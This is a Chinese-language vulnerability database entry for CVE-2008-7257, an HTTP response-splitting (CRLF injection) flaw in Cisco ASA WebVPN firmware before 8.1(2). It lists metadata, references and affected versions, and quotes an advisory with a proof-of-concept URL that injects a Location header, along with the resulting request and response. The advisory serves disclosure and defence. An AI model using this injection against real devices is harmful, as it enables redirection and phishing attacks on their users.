Cisco ASA HTTP响应拆分漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1119556 漏洞类型 输入验证
发布时间 2010-06-25 更新时间 2010-06-25
CVE编号 CVE-2008-7257 CNNVD-ID CNNVD-201006-457
漏洞平台 Hardware CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/34200
https://www.securityfocus.com/bid/41159
https://cxsecurity.com/issue/WLB-2010070169
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201006-457
|漏洞详情
CiscoAdaptiveSecurityAppliances(ASA,自适应安全设备)Software是美国思科(Cisco)公司的一套运行于防火墙中的操作系统。装有8.1(2)之前版本软件的Cisco5580系列自适应安全设备(ASA)中WebVPN的+webvpn+/index.html存在CRLF注入攻击漏洞。远程攻击者可以注入任意的HTTP头,正如利用URL中含有%0d%0aLocation%3a序列进行重定向攻击,或者通过不明向量进行HTTP响应拆分攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/41159/info

Cisco Adaptive Security Response (ASA) is prone to an HTTP response-splitting vulnerability.

Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into having a false sense of trust.

Firmware versions prior to Cisco ASA 8.1(2) are vulnerable.

This issue is being tracked by Cisco Bugid CSCsr09163.

URL: http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom Request: GET http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom HTTP/1.0 Host: /www.example.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Response: HTTP/1.0 301 Moved Permanently Server: Web Server Location: https:///www.example2.com/ Location: http:///www.example3.com Content-Type: text/html Content-Length: 125
|受影响的产品
Cisco PIX/ASA 8.1(1)5 Cisco PIX/ASA 8.1(1)4 Cisco PIX/ASA 8.1(1)2 Cisco PIX/ASA 8.1(1)13 Cisco PIX/ASA 8.1(1)1 Cisco PIX/ASA 8.1 Cisco PIX/ASA 8.0(4.9)
|参考资料

来源:BID
名称:41159
链接:http://www.securityfocus.com/bid/41159
来源:BUGTRAQ
名称:20100624[SWRX-2010-001]CiscoASAHTTPResponseSplittingVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/512023/100/0/threaded
来源:MISC
链接:http://www.secureworks.com/ctu/advisories/SWRX-2010-001
来源:www.cisco.com
链接:http://www.cisco.com/en/US/docs/security/asa/asa81/release/notes/asarn812.html
来源:SECTRACK
名称:1024155
链接:http://securitytracker.com/id?1024155
来源:NSFOCUS
名称:15323
链接:http://www.nsfocus.net/vulndb/15323